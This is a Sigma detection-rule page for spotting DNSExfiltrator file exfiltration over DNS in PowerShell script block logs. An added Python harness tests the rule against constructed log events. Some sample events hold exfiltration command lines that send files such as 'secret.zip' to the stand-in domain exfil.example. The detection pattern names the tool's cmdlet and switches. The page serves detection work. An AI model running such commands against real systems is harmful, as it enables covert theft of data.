Sigma rule | level: high | Hunting

Powershell DNSExfiltration

DNSExfiltrator allows transferring (exfiltrating) a file over a DNS request covert channel.

MITRE ATT&CK

exfiltration

Detection Query

selection_cmdlet:
  - ScriptBlockText|contains: Invoke-DNSExfiltrator
  - ScriptBlockText|contains|all:
      - " -i "
      - " -d "
      - " -p "
      - " -doh "
      - " -t "
condition: selection_cmdlet
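The selection above is a YAML list of two maps, so the two alternatives are OR-ed: the first fires on the cmdlet name anywhere in the script block, the second only when all five argument tokens appear. The following Python is an added example (not code from SigmaHQ, frack113 or the DNSExfiltrator project) that re-implements that logic and runs it over a handful of constructed PowerShell Script Block Logging (Event ID 4104) records, so the OR/AND structure, the case-insensitivity that Sigma string matching assumes, and the coverage gap of the argument branch can be seen directly. The event records and the `Event4104` type are constructed for illustration.

```python
"""Evaluate the rule's selection_cmdlet over constructed 4104 records.

Added example; not part of the Sigma rule, SigmaHQ or DNSExfiltrator.
"""
from dataclasses import dataclass

# Tokens copied verbatim from the rule's detection section.
CMDLET_NAME = "Invoke-DNSExfiltrator"
ARG_TOKENS = (" -i ", " -d ", " -p ", " -doh ", " -t ")


def contains(haystack: str, needle: str, case_sensitive: bool = False) -> bool:
    """Sigma 'contains': substring match. The Sigma specification treats
    string matching as case-insensitive; the flag lets you see what a backend
    that compiles it case-sensitively would do instead."""
    if case_sensitive:
        return needle in haystack
    return needle.casefold() in haystack.casefold()


def selection_cmdlet(script_block_text: str, case_sensitive: bool = False) -> bool:
    """Mirror the rule: the two list entries are OR-ed; inside the second,
    the |all modifier AND-s the five argument tokens."""
    by_name = contains(script_block_text, CMDLET_NAME, case_sensitive)
    by_args = all(contains(script_block_text, tok, case_sensitive) for tok in ARG_TOKENS)
    return by_name or by_args


@dataclass(frozen=True)
class Event4104:
    """Constructed stand-in for a PowerShell Script Block Logging record."""
    record_id: int
    script_block_text: str


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # 1: the Atomic Red Team style invocation via the PowerShell wrapper
    Event4104(1, "Invoke-DNSExfiltrator -i C:\\Users\\Public\\secret.zip "
                 "-d exfil.example -p P@ss -doh google -t 500"),
    # 2: same cmdlet, lower-cased, without the DoH/throttle switches
    Event4104(2, "invoke-dnsexfiltrator -i .\\a.txt -d exfil.example -p x"),
    # 3: the native binary called directly; only the argument branch can match
    Event4104(3, ".\\dnsExfiltrator.exe -i data.bin -d exfil.example "
                 "-p key -doh cloudflare -t 250"),
    # 4: unrelated administrative script
    Event4104(4, "Get-ChildItem -Path C:\\Windows\\Temp -Recurse"),
    # 5: benign tool whose CLI happens to use all five switches (false positive)
    Event4104(5, "mytool.exe -i in.dat -d out -p 8080 -doh off -t 3"),
    # 6: native binary run without -doh and -t; neither branch matches (miss)
    Event4104(6, ".\\dnsExfiltrator.exe -i data.bin -d exfil.example -p key"),
]


def evaluate(events, case_sensitive: bool = False) -> list:
    """Return the record_ids of events the rule's condition would alert on."""
    return [e.record_id for e in events
            if selection_cmdlet(e.script_block_text, case_sensitive)]


if __name__ == "__main__":
    print("alerts (spec semantics):", evaluate(SAMPLE_EVENTS))
    print("alerts (case-sensitive backend):", evaluate(SAMPLE_EVENTS, case_sensitive=True))
```

Two things worth checking in your own pipeline follow from the run: record 2 is only caught because the backend honours Sigma's case-insensitive matching, and record 6 shows that the argument branch needs every one of the five tokens, so a direct run of the binary that leaves out the DoH or throttle switch is only caught if the PowerShell cmdlet name appears in the script block.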

Author

frack113

Created

2022-01-07

Data Sources

windows / ps_script

Platforms

windows

Tags

attack.exfiltration
attack.t1048

Raw Content
title: Powershell DNSExfiltration
id: d59d7842-9a21-4bc6-ba98-64bfe0091355
status: test
description: DNSExfiltrator allows transferring (exfiltrating) a file over a DNS request covert channel
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh
    - https://github.com/Arno0x/DNSExfiltrator
author: frack113
date: 2022-01-07
tags:
    - attack.exfiltration
    - attack.t1048
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_cmdlet:
        - ScriptBlockText|contains: 'Invoke-DNSExfiltrator'
        - ScriptBlockText|contains|all:
              - ' -i '
              - ' -d '
              - ' -p '
              - ' -doh '
              - ' -t '
    condition: selection_cmdlet
falsepositives:
    - Legitimate script
level: high